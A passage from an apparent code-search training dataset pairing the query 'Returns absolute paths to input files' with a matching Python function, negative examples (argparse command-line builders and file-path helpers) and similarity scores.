(OPTIONAL)\n runparser.add_argument('-T', help=helpdict['T'], type=float,\n dest='temperature', default=1.0)\n # -- minimize (OPTIONAL)\n runparser.add_argument('--minimize', help=helpdict['minimize'],\n action='store_true')\n # -- minimize argument, minimization tolerance (OPTIONAL)\n runparser.add_argument('--minimize-tol', help=helpdict['minimize-tol'], type=float,\n dest='minimize_tol', default=0.00001)\n # -- fisher (OPTIONAL)\n runparser.add_argument('--fisher', help=helpdict['fisher'],\n action='store_true')\n # -- fisher argument (OPTIONAL)\n runparser.add_argument('--fisher-asymmetric', help=helpdict['fisher-asymmetric'],\n dest='fisher_asymmetric',action='store_true')\n # -- fisher step iteration (OPTIONAL)\n runparser.add_argument('--fisher-step-it', help=helpdict['fisher-step-it'],\n dest='fisher_step_it', default=10)\n # -- fisher step iteration argument, -deltaloglkl target (OPTIONAL)\n runparser.add_argument('--fisher-delta', help=helpdict['fisher-delta'], type=float,\n dest='fisher_delta', default=0.1)\n # -- fisher step iteration argument, -deltaloglkl tolerance (OPTIONAL)\n runparser.add_argument('--fisher-tol', help=helpdict['fisher-tol'], type=float,\n dest='fisher_tol', default=0.05)\n # -- fisher symmetric likelihood assumption threshold (OPTIONAL)\n runparser.add_argument('--fisher-sym-lkl', help=helpdict['fisher-sym-lkl'], type=float,\n dest='fisher_sym_lkl', default=0.1)\n # -- configuration file (OPTIONAL)\n runparser.add_argument('--conf', help=helpdict['conf'],\n type=str, dest='config_file',\n default='default.conf')\n # -- arbitrary numbering of an output chain (OPTIONAL)\n runparser.add_argument('--chain-number', help=helpdict['chain-number'])\n # -- stop run after first successful update using --update (EXPERIMENTAL)\n runparser.add_argument('--stop-after-update', help=helpdict['stop-after-update'],\n dest='stop_after_update', action='store_true')\n # display option\n runparser.add_argument('--display-each-chi2', help=helpdict['display-each-chi2'],\n dest='display_each_chi2', action='store_true')\n # -- parallel chains without MPI (OPTIONAL)\n runparser.add_argument('--parallel-chains', help=helpdict['parallel-chains'],\n action='store_true')\n\n ###############\n # MCMC restart from chain or best fit file\n runparser.add_argument('-r', '--restart', help=helpdict['r'],\n type=existing_file, dest='restart')\n runparser.add_argument('-b', '--bestfit', dest='bf', help=helpdict['b'],\n type=existing_file)\n\n ###############\n # Silence the output (no print on the console)\n runparser.add_argument('--silent', help=helpdict['silent'],\n action='store_true')\n ###############\n # Adding new derived parameters to a run\n runparser.add_argument(\n '--Der-target-folder', dest=\"Der_target_folder\",\n help=helpdict['Der-target-folder'], type=str, default='')\n runparser.add_argument(\n '--Der-param-list', dest='derived_parameters',\n help=helpdict['Der-param-list'], type=str, default='', nargs='+')\n\n ###############\n # Importance Sampling Arguments\n runparser.add_argument(\n '--IS-starting-folder', dest='IS_starting_folder',\n help=helpdict['IS-starting-folder'], type=str, default='', nargs='+')\n\n ###############\n # We need the following so the run does not crash if one of the external\n # samplers is not correctly installed despite not being used\n from contextlib import contextmanager\n import sys, os\n\n @contextmanager\n def suppress_stdout():\n with open(os.devnull, \"w\") as devnull:\n old_stdout = sys.stdout\n sys.stdout = devnull\n try:\n yield\n finally:\n sys.stdout = old_stdout\n\n ###############\n # MultiNest arguments (all OPTIONAL and ignored if not \"-m=NS\")\n # The default values of -1 mean to take the PyMultiNest default values\n try:\n with suppress_stdout():\n from MultiNest import NS_prefix, NS_user_arguments\n NSparser = runparser.add_argument_group(\n title=\"MultiNest\",\n description=\"Run the MCMC chains using MultiNest\"\n )\n for arg in NS_user_arguments:\n NSparser.add_argument('--'+NS_prefix+arg,\n default=-1,\n **NS_user_arguments[arg])\n except ImportError:\n # Not defined if not installed\n pass\n except:\n warnings.warn('PyMultiNest detected but MultiNest likely not installed correctly. '\n 'You can safely ignore this if not running with option -m NS')\n\n ###############\n # PolyChord arguments (all OPTIONAL and ignored if not \"-m=PC\")\n # The default values of -1 mean to take the PyPolyChord default values\n try:\n with suppress_stdout():\n from PolyChord import PC_prefix, PC_user_arguments\n PCparser = runparser.add_argument_group(\n title=\"PolyChord\",\n description=\"Run the MCMC chains using PolyChord\"\n )\n for arg in PC_user_arguments:\n PCparser.add_argument('--'+PC_prefix+arg,\n default=-1,\n **PC_user_arguments[arg])\n except ImportError:\n # Not defined if not installed\n pass\n except:\n warnings.warn('PyPolyChord detected but PolyChord likely not installed correctly. '\n 'You can safely ignore this if not running with option -m PC')\n\n ###############\n # CosmoHammer arguments (all OPTIONAL and ignored if not \"-m=CH\")\n # The default values of -1 mean to take the CosmoHammer default values\n try:\n with suppress_stdout():\n from cosmo_hammer import CH_prefix, CH_user_arguments\n CHparser = runparser.add_argument_group(\n title=\"CosmoHammer\",\n description=\"Run the MCMC chains using the CosmoHammer framework\")\n for arg in CH_user_arguments:\n CHparser.add_argument('--'+CH_prefix+arg,\n default=-1,\n **CH_user_arguments[arg])\n except ImportError:\n # Not defined if not installed\n pass\n except:\n warnings.warn('CosmoHammer detected but emcee likely not installed correctly. '\n 'You can safely ignore this if not running with option -m CH')\n\n ###############\n # Information\n infoparser = add_subparser(subparser, 'info',\n help=\"analyze the MCMC chains\")\n\n # -- folder to analyze\n infoparser.add_argument('files', help=helpdict['files'],\n nargs='+')\n # Silence the output (no print on the console)\n infoparser.add_argument('--silent', help=helpdict['silent'],\n action='store_true')\n # -- to only write the covmat and bestfit, without computing the posterior\n infoparser.add_argument('--minimal', help=helpdict['minimal'],\n action='store_true')\n # -- number of bins (defaulting to 20)\n infoparser.add_argument('--bins', help=helpdict['bins'],\n type=int, default=20)\n # -- temperature (OPTIONAL)\n infoparser.add_argument('-T', help=helpdict['T'], type=float,\n dest='temperature', default=1.0)\n # -- deprecated: remove the mean-likelihood line\n infoparser.add_argument('--no-mean', help=helpdict['no-mean'],\n dest='mean_likelihood_old', action='store_false')\n # -- plot the mean-likelihood line\n infoparser.add_argument('--plot-mean', help=helpdict['plot-mean'],\n dest='mean_likelihood', action='store_true')\n # -- to remove the mean and 68% limits on top of each 1D plot\n infoparser.add_argument('--short-title-1d', help=helpdict['short-title-1d'],\n dest='short_title_1d', action='store_true')\n # -- possible plot file describing custom commands\n infoparser.add_argument('--extra', help=helpdict['extra'],\n dest='optional_plot_file', default='')\n # -- if you just want the covariance matrix, use this option\n infoparser.add_argument('--noplot', help=helpdict['noplot'],\n dest='plot', action='store_false')\n # -- if you just want to output 1d posterior distributions (faster)\n infoparser.add_argument('--noplot-2d', help=helpdict['noplot-2d'],\n dest='plot_2d', action='store_false')\n # -- if you just want to output triangle with 2d contours\n infoparser.add_argument('--noplot-2d-diag', help=helpdict['noplot-2d-diag'],\n dest='plot_diag', action='store_false')\n # -- when plotting 2d posterior distribution, use contours and not contours\n # filled (might be useful when comparing several folders)\n infoparser.add_argument('--contours-only', help=helpdict['contours-only'],\n dest='contours_only', action='store_true')\n # -- if you want to output every single subplots\n infoparser.add_argument('--all', help=helpdict['all'], dest='subplot',\n action='store_true')\n # -- to change the extension used to output files (pdf is the default one,\n # but takes long, valid options are png and eps)\n infoparser.add_argument('--ext', help=helpdict['ext'],\n type=str, dest='extension', default='pdf')\n # -- to set manually the number of plots per hoorizontal raw in 1d plot\n infoparser.add_argument('--num-columns-1d', help=helpdict['num-columns-1d'],\n type=int, dest='num_columns_1d')\n # -- also analyze the non-markovian part of the chains\n infoparser.add_argument('--keep-non-markovian', help=helpdict['keep-non-markovian'],\n dest='markovian', action='store_false')\n # -- force only analyzing the markovian part of the chains\n infoparser.add_argument('--keep-only-markovian', help=helpdict['keep-only-markovian'],\n dest='only_markovian', action='store_true')\n # -- fraction of chains to be analyzed after burn-in removal (defaulting to 1.0)\n infoparser.add_argument('--keep-fraction', help=helpdict['keep-fraction'],\n type=float, dest='keep_fraction', default=1.0)\n # -- calculate the covariant matrix when analyzing the chains\n infoparser.add_argument('--want-covmat', help=helpdict['want-covmat'],\n dest='want_covmat', action='store_true')\n # -------------------------------------\n # Further customization\n # -- fontsize of plots (defaulting to 16)\n infoparser.add_argument('--fontsize', help=helpdict['fontsize'],\n type=int, default=16)\n # -- ticksize of plots (defaulting to 14)\n infoparser.add_argument('--ticksize', help=helpdict['ticksize'],\n type=int, default=14)\n # -- linewidth of 1d plots (defaulting to 4, 2 being a bare minimum for\n # legible graphs\n infoparser.add_argument('--line-width', help=helpdict['line-width'],\n type=int, default=4)\n # -- number of decimal places that appear on the tick legend. If you want\n # to increase the number of ticks, you should reduce this number\n infoparser.add_argument('--decimal', help=helpdict['decimal'], type=int,\n default=3)\n # -- number of ticks that appear on the graph.\n infoparser.add_argument('--ticknumber', help=helpdict['ticknumber'],\n type=int, default=3)\n # -- legend type, to choose between top (previous style) to sides (new\n # style). It modifies the place where the name of the variable appear.\n infoparser.add_argument('--legend-style', help=helpdict['legend-style'],\n type=str, choices=['sides', 'top'],\n default='sides')\n # -- width of gaussian smoothing for plotting posteriors,\n # in units of bin size, increase for smoother data.\n infoparser.add_argument('--gaussian-smoothing', help=helpdict['gaussian-smoothing'],\n type=float, default=0.5)\n # interpolation factor for plotting posteriors, 1 means no interpolation,\n # increase for smoother curves (it means that extra bins are created\n # and interpolated between computed bins)\n infoparser.add_argument('--interpolation-smoothing', help=helpdict['interpolation-smoothing'],\n type=int, default=4)\n # -- plot Fisher ellipses\n infoparser.add_argument('--plot-fisher', help=helpdict['plot-fisher'],\n dest='plot_fisher',action='store_true')\n infoparser.add_argument('--center-fisher', help=helpdict['center-fisher'],\n dest='center_fisher',action='store_true')\n\n infoparser.add_argument('--posterior-smoothing', help=helpdict['posterior-smoothing'],\n type=int, default=5)\n\n return parser", "def build_arg_parser(self):\n super(App, self).build_arg_parser()\n\n self.parser.add_argument('-v', '--verbose', action='store_true', help=\"be more verbose\")\n\n subparsers = self.parser.add_subparsers(help=\"package sub-command\", dest=\"command\")\n\n list_parser = subparsers.add_parser(\"list\") # aliases=['ls'] only works with python 3\n list_parser.add_argument('-l', '--long', action='store_true', help=\"print more detail\")\n list_parser.add_argument('--all', action='store_true', help=\"include old versions of packages\")\n list_parser.add_argument('-b', '--bundles', action='store_true', help=\"print Package bundle information\")\n list_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='*', type=str,\n help='package ids', default=[])\n\n create_parser = subparsers.add_parser(\"create\", )\n create_parser.add_argument('names', metavar='NAME', nargs='+', type=str, help='package name', default=[])\n create_parser.add_argument('--os', action='store', help=\"os type\", default=\"unix\", choices=[\"unix\", \"windows\"])\n create_parser.add_argument('--appserver', action='store', help=\"appserver type\", choices=App.appservers, default=\"other\")\n create_parser.add_argument('--agent-version', action='store', help=\"agent version\", default=\"10.2\")\n create_parser.add_argument('--process-display-name', action='store', help=\"process display name\", default=\"\")\n create_parser.add_argument('--comment', action='store', help=\"package comment\", default=\"\")\n create_parser.add_argument('--em-host', action='store', help=\"package comment\", default=\"\")\n\n modify_parser = subparsers.add_parser(\"modify\")\n modify_parser.add_argument('-a', '--add', action='append', help=\"Add a bundle to a package\", default=[])\n modify_parser.add_argument('-r', '--remove', action='append', help=\"Remove a bundle from a package\", default=[])\n modify_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='*', type=str,\n help='package ids', default=[])\n\n download_parser = subparsers.add_parser(\"download\")\n download_parser.add_argument('--format', action='store',\n help='write files in the given format. \"archive\" means zip for windows packages, tar.gz for unix packages',\n default=\"archive\", choices=[\"zip\", \"tar\", \"archive\"])\n download_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='*', type=str,\n help='package ids', default=[])\n download_parser.add_argument('--all', action='store_true', help=\"also download old versions of packages\")\n\n delete_parser = subparsers.add_parser(\"delete\")\n delete_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='+', type=str,\n help='package ids')\n\n override_parser = subparsers.add_parser(\"overrides\")\n\n # group = override_parser.add_mutually_exclusive_group()\n override_parser.add_argument('-l', '--list', action='store_true', help=\"list overrides\", default=False)\n override_parser.add_argument('--all', action='store_true', help=\"include old versions of packages\")\n override_parser.add_argument('--copy', action='store_true', help=\"copy overrides to another package\", default=False)\n\n override_parser.add_argument('package_ids', metavar='PACKAGE_ID', nargs='*', type=str, help='package ids')", "def parseargs() -> argparse.ArgumentParser:\n\n parser = worker.parseargs(\"ACT hybrid-analysis.com Client\")\n\n parser.add_argument(\n \"--feed\", action=\"store_true\", help=\"Download the public feed only, no lookup\"\n )\n\n parser.add_argument(\n \"--apikey\", default=\"\", help=\"community apikey for hybrid-analysis.com\"\n )\n\n parser.add_argument(\n \"--user-agent\", default=\"Falcon Sandbox\", help=\"User agent while talking to API\"\n )\n\n parser.add_argument(\n \"--no-check-certificate\",\n action=\"store_true\",\n help=\"Do not check SSL certificate\",\n )\n\n return parser", "def parseCommandLine():\n parser = OptionParser(usage=\"%prog \", version=\"%prog \" + __version__,\n description='''\n This program calculates omegaAB value from a hexagonal lattice trajectory\n stored in xyz file (see for more details)''')\n parser.add_option(\"-f\", \"--traj\", dest=\"inXyzFilename\",default = \"hexTraj.xyz\",\n help=\"xyz input trajectory file (default traj.xyz)\", metavar=\"INXYZFILE\")\n parser.add_option(\"-r\", \"--reference\", dest=\"symbol\",default = \"P11\",\n help=\"reference particle name\", metavar=\"ADATOM\")\n parser.add_option(\"-o\", \"--output\", dest=\"outDatFilename\", default=\"omega.dat\",\n help=\"output dat file with omega values for each frame. WARNING: it will be overriden\", metavar=\"OUTXYZFILE\")\n \n parser.add_option(\"-q\", \"--quiet\",\n action=\"store_false\", dest=\"verbose\", default=True,\n help=\"don't print status messages to stdout\")\n\n (options, _) = parser.parse_args()\n\n return options" ]
[ "0.69869363", "0.6829675", "0.6746405", "0.6673381", "0.66188794", "0.658462", "0.6580858", "0.6543717", "0.65387374", "0.6531024", "0.6523515", "0.6503992", "0.6499173", "0.64667153", "0.6449182", "0.6419928", "0.6393331", "0.6363311", "0.6360073", "0.6353206", "0.63527614", "0.63351756", "0.63256425", "0.63177186", "0.630223", "0.6298224", "0.6294251", "0.62868905", "0.6282018", "0.62447035", "0.6242236", "0.62398005", "0.62383705", "0.6238009", "0.6236067", "0.6235225", "0.62155765", "0.62056255", "0.6201227", "0.6196762", "0.6192222", "0.6176419", "0.61630297", "0.61398506", "0.6138216", "0.6138216", "0.6138216", "0.61327994", "0.61323196", "0.6127003", "0.6127003", "0.6120716", "0.6114867", "0.6109584", "0.6106246", "0.6104212", "0.6099471", "0.60977334", "0.6088997", "0.60684705", "0.6065659", "0.6053336", "0.60531306", "0.6048594", "0.60467696", "0.60449123", "0.60390586", "0.60337496", "0.6033043", "0.6030829", "0.6030375", "0.60289943", "0.601002", "0.6005376", "0.60048044", "0.6004643", "0.60026675", "0.59997654", "0.59951085", "0.5993511", "0.59930956", "0.59886754", "0.5986557", "0.5980693", "0.5975424", "0.5973162", "0.59713376", "0.59711945", "0.59665245", "0.5965742", "0.5963867", "0.5960802", "0.5955948", "0.5955613", "0.59553003", "0.5954248", "0.59518105", "0.59427226", "0.59426916", "0.5935008" ]
0.7635935
0
Returns absolute paths to input files.
def abspath(files): files = sum([glob.glob(x) for x in files], []) return [os.path.abspath(x) for x in files]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def inputpathabs(self):\n return os.path.abspath(self.inputpath)", "def get_file_list(input_dir):\n\tfile_paths = [input_dir +'/' + f for f in listdir(input_dir) if isfile(join(input_dir, f)) ]\n\treturn file_paths", "def sources_absolute_paths(self):\r\n abs_target_base = os.path.join(get_buildroot(), self.target_base)\r\n for src in self.sources:\r\n yield os.path.join(abs_target_base, src)", "def get_input_files(dir_path):\n return [os.path.join(dir_path,f) for f in os.listdir(dir_path)\n if os.path.isfile(os.path.join(dir_path,f))]", "def input_path(self, filename):\n\n return os.path.abspath(os.path.expanduser(os.path.join(self.input_dir, filename)))", "def _get_file_paths(self):\n return [os.path.join(self.path, self.mode, 'waveforms', file_name + '.npy') for file_name in self.file_names]", "def get_file_paths():\n audio_folder = MY_DIR + '/assets'\n\n audio_addy_list = []\n for file in os.scandir(audio_folder):\n audio_addy_list.append(file.path)\n\n return audio_addy_list", "def get_paths(input_folder):\n list_files = []\n conll_folder = glob.glob(input_folder + '/*.json')\n \n for filename in conll_folder:\n list_files.append(filename)\n\n return list_files", "def get_image_path(raw_input_dir: str) -> list:\n result = []\n for root, dirs, files in os.walk(raw_input_dir):\n for file in files:\n result.append(os.path.join(root, file))\n return result", "def get_paths(file_path):\n return glob(path.join(file_path, '*'))", "def input_path(self, filename):\n\n return self.filename_path_join(self.input_dir, filename)", "def filepaths(self):\n pass", "def getpaths_fromfile(input_prefix_, file_handle_):\n\n input_paths = []\n\n for line in file_handle_:\n line = line.strip()\n if line != \"\":\n dirname = line\n path = os.path.join(input_prefix_, \"%s*\" % dirname)\n input_paths.append(tuple([dirname, path]))\n\n return input_paths", "def handle_files_args(*paths_args):\n paths = []\n\n for paths_arg in paths_args:\n # Handle paths implicitly rooted at user home dir\n paths_arg = os.path.expanduser(paths_arg)\n\n # Expand wildcards\n paths_arg = glob.glob(paths_arg)\n\n # Create list of pathlib.Path objects\n paths.extend([pathlib.Path(path_arg) for path_arg in paths_arg])\n\n return paths", "def get_input_files(self, action):\n assert action == \"run\", \"Unsupported action\"\n return self.path_tpl.format(infix=\"\", ext=\".bam\")", "def inputFiles(self):\n return (self.matrixFile,)", "def test_get_output_filepaths(self):\r\n\r\n output_dir = \".\"\r\n\r\n fasta_fp = \"seqs.fna\"\r\n\r\n qual_fp = \"seqs.qual\"\r\n\r\n expected_fasta_fp = \"./seqs_filtered.fasta\"\r\n expected_qual_fp = \"./seqs_filtered.qual\"\r\n\r\n actual_fasta_fp, actual_qual_fp =\\\r\n get_output_filepaths(output_dir, fasta_fp, qual_fp)\r\n\r\n self.assertEqual(actual_fasta_fp, expected_fasta_fp)\r\n self.assertEqual(actual_qual_fp, expected_qual_fp)\r\n\r\n # Test for relative paths\r\n output_dir = \"test/\"\r\n\r\n fasta_fp = \"../seqs.fna\"\r\n\r\n qual_fp = \"quality_scores/seqs.qual\"\r\n\r\n expected_fasta_fp = \"test/seqs_filtered.fasta\"\r\n expected_qual_fp = \"test/seqs_filtered.qual\"\r\n\r\n actual_fasta_fp, actual_qual_fp =\\\r\n get_output_filepaths(output_dir, fasta_fp, qual_fp)\r\n\r\n self.assertEqual(actual_fasta_fp, expected_fasta_fp)\r\n self.assertEqual(actual_qual_fp, expected_qual_fp)", "def find_all_infilepaths(in_dir):\n workdir = os.getcwd()\n os.chdir(in_dir)\n\n infiles_paths = dict()\n for infilename in glob.glob(\"[0-9]*_[0-9]*_[0-9]*.hdf5\"):\n pos = infilename.split('_')\n pos[-1] = pos[-1].split('.')[0]\n pos = tuple(list(map(lambda s: int(s), pos)))\n num_pos = _3d_to_numeric\n infiles_paths[num_pos] = os.path.join(in_dir, infilename)\n\n os.chdir(workdir)\n return infiles_paths", "def detectFiles(self, input):\n output = []\n if os.path.isfile(input):\n output.append(input)\n else:\n input = os.path.join(input, '*') if os.path.isdir(input) else input\n for file in glob.glob(input):\n output.append(file)\n return output", "def inputFiles(self):\n inputfiles = set()\n for f in self:\n [ inputfiles.add(x) for x in f['input']]\n return list(inputfiles)", "def get_paths(input_folder: str) -> list[str]:\n\n return [f for f in os.listdir(input_folder) if f[-4:] == '.txt' and f[:3] != 'top']", "def collect_input_files(input_directory_path: Path) -> Generator[Path, None, None]:\n return input_directory_path.glob('**/*')", "def input_files_from_path(path):\n import glob\n input_files = None\n if type(path) is list:\n input_files = []\n for p in path:\n if '*' in p:\n input_files.extend(glob.glob(p))\n else: # neither wildcard nor comma separated list\n input_files.append(p)\n else:\n if ',' in path:\n input_files = path.split(',')\n elif '*' in path:\n input_files = glob.glob(path)\n else: # neither wildcard nor comma separated list\n input_files = [path]\n input_files = [os.path.abspath(f) for f in input_files]\n return [f for f in input_files if os.path.exists(f) or f.startswith('/store')]", "def full_path(startPath,files):\n\n files = list_strings(files)\n base = os.path.split(startPath)[0]\n return [ os.path.join(base,f) for f in files ]", "def relative_to_buildroot(self):\n return [os.path.join(self.rel_path, source) for source in self.source_paths]", "def getFilePaths():\n \n image_dir = r'/hpc/wfok007/mpi_heart/Training Set'\n mask_paths = []\n image_paths = []\n for root, dirs, files in os.walk(image_dir, topdown=False):\n for name in files:\n if name == 'laendo.nrrd':\n mask_paths.append(os.path.join(root, name))\n elif name == 'lgemri.nrrd':\n image_paths.append(os.path.join(root, name))\n else:\n print ('%s is unknown' %name)\n return mask_paths, image_paths", "def get_files_paths(self):\n return self.__files_paths", "def resolve_file_paths(local_path):\n local_path = os.path.abspath(local_path)\n files = []\n if local_path.find('*') > -1:\n # Supplied path is a pattern - relative directory will be the\n # path up to the first wildcard\n ref_dir_str = local_path.split('*')[0].rstrip('/\\\\')\n if not os.path.isdir(ref_dir_str):\n ref_dir_str = os.path.dirname(ref_dir_str)\n ref_dir = pathlib.Path(ref_dir_str)\n pattern = local_path[len(ref_dir_str + os.pathsep):]\n files = [str(f) for f in ref_dir.glob(pattern) if f.is_file()]\n local_path = ref_dir_str\n else:\n if os.path.isdir(local_path):\n # Supplied path is a directory\n files = [os.path.join(local_path, f) for f in os.listdir(local_path)\n if os.path.isfile(os.path.join(local_path, f))]\n elif os.path.isfile(local_path):\n # Supplied path is a file\n files.append(local_path)\n local_path = os.path.dirname(local_path)\n return local_path, files", "def output_files(self):\n output_files = []\n for split in self.split_files:\n output_files.extend(split.filepaths)\n return output_files", "def get_file_list(input_list):\n if not isinstance(input_list, Iterable)\\\n or isinstance(input_list, str):\n raise BirdVoxClassifyError('input_list must be a non-string iterable')\n file_list = []\n for item in input_list:\n if os.path.isfile(item):\n file_list.append(os.path.abspath(item))\n elif os.path.isdir(item):\n for fname in os.listdir(item):\n path = os.path.join(item, fname)\n if os.path.isfile(path):\n file_list.append(path)\n else:\n raise BirdVoxClassifyError(\n 'Could not find input at path {}'.format(item))\n\n return file_list", "def get_all_paths(why = 'train'):\r\n if why == 'train':\r\n parent_folder = train_parent_folder\r\n if why == 'test':\r\n parent_folder = test_test_folder\r\n sub_folders = glob.glob(parent_folder) # Directories of all languages\r\n image_paths = [glob.glob(sub_folder + '\\*') for sub_folder in sub_folders] # Directories of all characters\r\n image_paths = sum(image_paths, []) # Flatten out the 2D list to a 1D list \r\n return image_paths", "def _map_files(self, files):\n if getattr(files, '__iter__', None):\n for f in files:\n if not os.path.isabs(f):\n yield os.path.join(self._path, f)\n else:\n yield f\n else:\n if not os.path.isabs(files):\n yield os.path.join(self._path, files)\n else:\n yield files", "def get_input_files():\n\n raw_list = abspath(get('input_files'))\n valid_types = ['image/jpeg', 'image/tiff']\n images = [x for x in raw_list if mimetypes.guess_type(x)[0] in valid_types]\n print('* Input images: {}'.format(len(images)))\n return images", "def get_paths(args):\n log, rest = get_log_path(args)\n out, _ = get_out_path(args)\n temp, _ = get_temp_path(args)\n return log, out, temp, rest", "def get_all_fullpaths(self):\n files = []\n for mf in self.manifests:\n files.extend(self.manifests[mf].get_fullpaths())\n return files", "def filePaths(directory_with_files):\n\n # get a list of file names in directory\n list_of_files = os.listdir(directory_with_files) \n\n # join directory path and file name to get full paths to files\n filepaths = [os.path.join(directory_with_files, filename) for filename in list_of_files]\n\n return filepaths", "def get_datapaths(input_dir):\n image_paths = []\n assert os.path.isdir(input_dir), f\"{input_dir} is not existed\"\n\n for root, _, names in os.walk(input_dir):\n for name in names:\n path = os.path.join(root, name)\n image_paths.append(path)\n return image_paths", "def output_files(self):\n return [self.input_files()[0].replace(\".lhe.gz\", \".stdhep\").replace(\".lhe\", \".stdhep\")]", "def _generate_file_paths(self):\n for table_name in self.tables:\n logger.info(f\"Generating input and output paths for table '{table_name}'...\")\n self.input_paths[table_name] = os.path.join(self.pipeline['input_dir'], f'{table_name}.xml')\n logger.info(f\"Input path for table '{table_name}': {self.input_paths[table_name]}\")\n self.output_paths[table_name] = os.path.join(self.pipeline['output_dir'], f'{table_name}.jsonl')\n logger.info(f\"Output path for table '{table_name}': {self.output_paths[table_name]}\")\n logger.info(f\"Generated {len(self.input_paths)} input paths and {len(self.output_paths)} output paths.\")", "def get_paths(self):\n return (self.world_fpath, self.subj_fpath, self.peds_fpath)", "def get_input_files(workflow_id):\n logger = fsurfer.log.get_logger()\n input_files = []\n conn = None\n try:\n conn = fsurfer.helpers.get_db_client()\n cursor = conn.cursor()\n input_query = \"SELECT path \" \\\n \"FROM freesurfer_interface.input_files \" \\\n \"WHERE job_id = %s\"\n cursor.execute(input_query, [workflow_id])\n for row in cursor.fetchall():\n input_files.append(row[0])\n input_files.append(os.path.dirname(row[0]))\n except psycopg2.Error as e:\n logger.exception(\"Error: {0}\".format(e))\n return None\n finally:\n if conn:\n conn.close()\n return input_files", "def get_train_input_paths(self, random_effect_name):\n output_dir = path_join(self.root_output_dir, path_join(random_effect_name, \"partition\"))\n training_data_dir = path_join(output_dir, \"trainingData\")\n validation_data_dir = path_join(output_dir, \"validationData\")\n metadata_file = path_join(output_dir, path_join(\"metadata\", \"tensor_metadata.json\"))\n partition_list_file = path_join(output_dir, \"partitionList.txt\")\n return training_data_dir, validation_data_dir, metadata_file, partition_list_file", "def get_input_files(self, action):\n\n def input_function(wildcards):\n \"\"\"Helper rapper function\"\"\"\n return expand(\n self.base_path_in.format(wildcards=wildcards),\n postproc=[self._get_postproc_token()],\n ext=self.extensions,\n )\n\n assert action == \"run\", \"Unsupported action\"\n return input_function", "def _get_paths():\n paths = [\n '/'\n ]\n return paths", "def get_source_files(self):\n return [\n path.as_posix()\n for path in _Path(self.src_dir).rglob(\"*\")\n if not path.is_dir()\n ] + [\n (path / \"CMakeLists.txt\").as_posix()\n for path in _PurePath(self.src_dir).parents\n ]", "def input_dir(path):\n global datasets\n\n path = os.path.abspath(path)\n if not os.path.isdir(path):\n raise IOError('Incorrect input_dir specified: no such directory')\n for dataset_name in datasets:\n dataset_path = os.path.join(path, '%s_set.hdf' % dataset_name)\n if not os.path.exists(dataset_path):\n raise IOError('Incorrect input_dir specified:'\n ' %s set file not found' % dataset_path)\n return path", "def inputpathrel(self):\n if self.config:\n relpath = os.path.relpath(self.inputpath, self.config.workingdir)\n\n if relpath.startswith(\"../\"):\n return self.inputpath\n\n else:\n return relpath\n\n return self.inputpath", "def GetInputPath(self):\n self.inputDir = raw_input(\"Where should files be read from? This can be a file or a folder of files\\n\\r>>> \")\n if os.path.isabs(self.inputDir):\n if os.path.isdir(self.inputDir):\n self.isFolder = True\n self.inputDirs = os.listdir(self.inputDir)\n elif os.path.isfile(self.inputDir):\n self.isFolder = False\n self.inputDirs = [self.inputDir]\n else:\n print \"That path does not exist. Try again\"\n self.GetInputPath()\n else:\n print \"that was not an excepted path name. Try again.\"\n self.GetInputPath()", "def test_get_output_filepaths(self):\r\n\r\n actual_fna_fp, actual_log_fp = get_output_filepaths(\".\",\r\n '/home/tests/seqs.fna')\r\n\r\n expected_fna_fp = \"./seqs_rev_primer_truncated.fna\"\r\n expected_log_fp = \"./rev_primer_truncation.log\"\r\n\r\n self.assertEqual(actual_fna_fp, expected_fna_fp)\r\n self.assertEqual(actual_log_fp, expected_log_fp)", "def GetExpectationFilepaths(self) -> List[str]:\n raise NotImplementedError()", "def treat(input, output):\n files = find(input)\n acc = []\n for file in files:\n fileInfo = extract(file)\n out = makeOutputPath(output, fileInfo[\"path\"], fileInfo[\"filename\"])\n if not out == None:\n fileInfo[\"outPath\"] = out\n acc += [fileInfo]\n return acc", "def join_infile_path(*paths):\n # Join path components\n path = '/'.join(paths)\n # Correct double slashes, if any is present\n path = path.replace('//', '/')\n\n return path", "def get_data_file_paths(input_folder: str, data_file_prefix: str = \"\",\n data_file_postfix: str = \".nc\") -> list:\n data_file_paths = list()\n # we look at all subfolders, whatever they are named\n subfolders = get_files(input_folder, keep_path=True, order_numerical=True)\n for subfolder in subfolders:\n data_files = get_files(subfolder, prefix=data_file_prefix,\n postfix=data_file_postfix, keep_path=True,\n order_numerical=True)\n data_file_paths += data_files\n return data_file_paths", "def _resolve_paths(paths):\n allowed_ext = tuple(MIMES.keys())\n\n resolved = []\n for path in paths:\n if os.path.isdir(path):\n resolved.extend(\n entry.path for entry in os.scandir(path)\n if entry.is_file() and entry.name.lower().endswith(allowed_ext)\n )\n elif os.path.isfile(path) and path.lower().endswith(allowed_ext):\n resolved.append(path)\n return resolved", "def get_output_filepaths(output_dir,\r\n fasta_fp,\r\n qual_fp):\r\n\r\n if not output_dir.endswith('/'):\r\n output_dir += '/'\r\n\r\n fasta_out_fp = output_dir + basename(fasta_fp).split('.')[0] +\\\r\n \"_filtered.fasta\"\r\n\r\n qual_out_fp = output_dir + basename(qual_fp).split('.')[0] +\\\r\n \"_filtered.qual\"\r\n\r\n return fasta_out_fp, qual_out_fp", "def _get_file_paths(self, ignored_exts: Optional[Set[str]]) -> List[str]:\n dir_path = os.path.join(self._target_dir, '**')\n all_paths = glob.glob(dir_path, recursive=True)\n if ignored_exts is None:\n return [p for p in all_paths if os.path.isfile(p)]\n file_paths = [p for p in all_paths if self._extr_ext(p) not in ignored_exts]\n return [p for p in file_paths if os.path.isfile(p)]", "def input_path(self):\n \n input_path = stringify(self._input_path)\n if input_path is None:\n with current_context() as ctx:\n input_path_relative = stringify(self.input_path_relative)\n if input_path_relative is not None:\n input_path = join_path(ctx.paths.input, input_path_relative)\n else:\n input_path = ctx.current.project.input_path\n return input_path", "def local_paths(self) -> List[Path]:\n return self._local_paths", "def glob_fs(self):\n\n found_files = []\n for pattern in self.glob_patterns:\n found_files += [PathString(present_file)\n for present_file in glob.glob(pattern)]\n return found_files", "def _get_target_files(self) -> List[Path]:\n repo = get_git_repo()\n submodules = repo.submodules # type: ignore\n submodule_paths = [\n self._fname_to_path(repo, submodule.path) for submodule in submodules\n ]\n\n # resolve given paths relative to current working directory\n paths = [p.resolve() for p 